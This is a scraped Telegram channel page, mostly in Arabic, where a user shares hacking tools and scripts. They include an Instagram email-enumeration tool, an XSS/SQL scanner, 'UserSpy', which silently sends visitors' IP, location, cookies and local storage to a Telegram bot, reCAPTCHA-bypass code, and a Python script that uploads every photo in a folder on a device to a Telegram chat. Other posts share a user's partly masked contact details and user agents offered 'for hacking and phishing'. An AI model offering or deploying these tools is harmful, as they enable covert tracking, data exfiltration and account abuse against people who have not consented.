XbYiT 🕊️
61 subscribers
28 photos
15 files
42 links
A channel in which I publish:
Tools, api , bots, projects, courses
in the field of programming.
The channel owner's username: @XbYiT
Download Telegram
This media is not supported in your browser
VIEW IN TELEGRAM
#update
تم تحديث الاداة :
https://github.com/Xghostxdz/Fastmux

ما الجديد
ـ تغير الاسم من swiftshell الى Fastmux
ـ تصحيح الأخطاء
ـ اعادة نشرها في حساب جديد القديم تم تبنيده (سبب مجهول )
طريقة التحميل و التشغيل :
pkg install git
git clone https://github.com/Xghostxdz/Fastmux
cd Fastmux
bash install.sh
اي اقتراح جديد ارسله هنا :
@XG_HOST
#Newtool
اداة فحص ايمايلات انستقرام
شرح الاداة :
الكود المكتوب بلغة Ruby يقوم بتوليد عناوين بريد إلكتروني عشوائية للتحقق من وجود حسابات على Instagram. يستخدم دالة check لإرسال طلب POST إلى واجهة API الخاصة بـ Instagram لاسترجاع بيانات حساب مرتبط بعنوان البريد الإلكتروني. يتم تحليل استجابة API لتحديد ما إذا كان الحساب موجودًا أم لا، مما يساعد في عمليات مثل استرداد الحسابات أو التحقق من صحة أسماء المستخدمين.
طريقة الاستخدام :
pkg install ruby
pkg install git
gem install httparty
git clone https://github.com/Xghostxdz/Instagram-email-check-
cd /Instagram-email-check-
ruby email.rb

By : @XG_HOSY
👏2👍1
فحص ثغرات SQL/XSS
🫡3
#Newtoo
اداة تفحص المواقع من ثغرة xss/sql
الكود مكتوب بلغة ruby يقوم بحفص المواقع من وجود ثغرات XSS/SQL
طريقة التشغيل :
pkg install git
Pkg install ruby
gem install httparty
git clone https://github.com/Xghostxdz/Web-scanner-
cd Web-scanner-
ruby scanner.rb -u (site url)
By : @XG_HOSY
رابط جروب الخاص بالقناة :
ملاحظة
*متواجد هناك 24/24 اذا كان لديك اي تساؤل او اقتراح او مشكل سوف احاول الاجابات عليه هناك *

t.me/xtoolpychat
#Newscript
سكربت بسيط يقول لك معلومات عن جهازك باستخدام لغة بايثون
import platform

def get_device_info():
system = platform.system()
node = platform.node()
release = platform.release()
version = platform.version()
machine = platform.machine()
processor = platform.processor()

print(f"System: {system}")
print(f"Node Name: {node}")
print(f"Release: {release}")
print(f"Version: {version}")
print(f"Machine: {machine}")
print(f"Processor: {processor}")

if name == "main":
get_device_info()

By : @XG_HOST
#New_Tool/Update
"BashWizard"

This Bash script is a multi-purpose tool designed for system management, including package installation, link checking, and network management. It aims to simplify common tasks for users.


"Features"

- Update Packages:
Update all installed packages on the system.

- Install Tools:
Install tools like curl, wget, net-tools, and dnsutils.
- Package Management:
Easily install and remove packages

.
- Check URL Safety:

Verify if URLs are safe and accessible.

- Check DNS:
Query DNS records for specific domains.

- Check Ports:
Check the status of open ports on a specified host.

- Clean Temporary
Files:
Clean temporary files from the system.

Install /usage :
git clone https://github.com/Xghostxdz/BashWizard
cd BashWizard
chmod +x install.sh
./install.sh
#Newtool
UserSpy :
UserSpy is a website that captures user information such as IP address, location, device name, browser version, operating system, screen resolution, timezone, language, referrer, cookies, and local storage data. The captured information is sent to a Telegram account without displaying it to the user.
Features :
- Captures user information
- Sends information to a Telegram account
- Does not display captured information to the user
Requirements :
- HTML
- CSS
- JavaScript
- Telegram Bot API
Installation :
1. Create a Telegram bot and obtain the bot token and chat ID.
2. Replace <YOUR_BOT_TOKEN> with your actual Telegram bot token and <YOUR_CHAT_ID> with your actual chat ID in the code.
3. Host the website on a web server.
By : @XG_HOST
🫡2
XbYiT 🕊️
Photo
تم انشاء موقع يمكنكم استخدام الاتصال الخاص به و ربطه باداتك
https://xghostxdz.github.io/Xghost.io/
لتجاوز reCAPTCHA، يمكنك استخدام مكتبة أو أداة تتفاعل مع تحدي reCAPTCHA وتحله برمجيًا. إليك مثال على كيفية القيام بذلك باستخدام مكتبة 2captcha في بايثون:

from twocaptcha import TwoCaptcha

def solv_recaptcha(site_key, url):
solver = TwoCaptcha('YOUR_API_KEY')
result = solver.recaptcha(sitekey=site_key, url=url)
return result['code']

# مثال للاستخدام
site_key = '6Lc2nScTAAAAAJtlog8urtCk1c-d6_KzYSyWRKc'
url = 'https://example.com/recaptcha'
V2recaptcha = solv_recaptcha(site_key, url)

استبدل 'YOUR_API_KEY' بمفتاح API الخاص بك من خدمة 2Captcha.
site_key هو المعرف الفريد لتحدي reCAPTCHA، وurl هو رابط الصفحة التي تحتوي على reCAPTCHA.

هذا الكود يستخدم مكتبة 2captcha لحل تحدي reCAPTCHA. تحتاج إلى مفتاح API صالح من 2Captcha لاستخدام هذه المكتبة. يمكنك التسجيل للحصول على حساب مجاني في 2Captcha للحصول على مفتاح API الخاص بك.

تذكر أن تجاوز reCAPTCHA قد يكون مخالفًا لشروط الخدمة الخاصة بالمواقع المستهدفة. من المهم استخدام هذه التقنية بمسؤولية وبطريقة أخلاقية.
👍1
Forwarded from Back again... (Mohammed Almuswi 🫶)
info-user-tiktok.py
3.8 KB
User : klht
['a*h@gmail.com', '+964**70', '']
يرسل هذا البرنامج النصي جميع الصور من دليل محدد إلى دردشة Telegram باستخدام روبوت. تأكد من استبدال "YOUR_BOT_TOKEN" و"YOUR_CHAT_ID" و"PHOTOS_DIRECTORY" برمز الروبوت الفعلي ومعرف الدردشة والدليل
import os
import requests

# Replace 'YOUR_BOT_TOKEN' with your actual Telegram bot token
bot_token = 'YOUR_BOT_TOKEN'

# Replace 'YOUR_CHAT_ID' with the chat ID of the recipient
chat_id = 'YOUR_CHAT_ID'

# Replace 'PHOTOS_DIRECTORY' with the directory path where the photos are stored
photos_directory = 'PHOTOS_DIRECTORY'

# Define the URL for sending photos
url = f'https://api.telegram.org/bot{bot_token}/sendPhoto'

# Get the file paths of all the photos in the directory
photo_file_paths = [os.path.join(photos_directory, file) for file in os.listdir(photos_directory) if file.endswith(('.jpg', '.jpeg', '.png', '.gif'))]

# Send each photo to the Telegram bot
for photo_file_path in photo_file_paths:
try:
# Open the photo file
with open(photo_file_path, 'rb') as photo_file:
# Define the payload for sending the photo
payload = {
'chat_id': chat_id,
'caption': 'This is a photo from the device',
'parse_mode': 'HTML'
}

# Define the files to send
files = {
'photo': photo_file
}

# Send the photo to the Telegram bot
response = requests.post(url, data=payload, files=files)

# Check the response
if response.status_code == 200:
print(f'Photo {photo_file_path} sent successfully.')
else:
print(f'Error occurred: {response.text}')

except Exception as e:
print(f'Failed to send photo {photo_file_path}: {e}')
https://github.com/Xghostxdz/UploadX
مشروع UploadX هو مشروع لإدارة الملفات و مشاركتها مع الناس مع امكانية تحميليها اي خطاء راسلوني :
@xg_host
Forwarded from NiXXR | Python 🦊 (𝐍𝐈𝐗𝐗𝐑 | Dark CARACAL)
useragents.txt
112.1 KB
ملف فيه ألف يوزر اجينت(user agent)
مسربة من بطاقات تعريفة من مواقع مشهورة
يمكن استخدامها للأختراق و الصيد 🦊🔥
#DarkCaracal@pyNiXXR
Your opinion?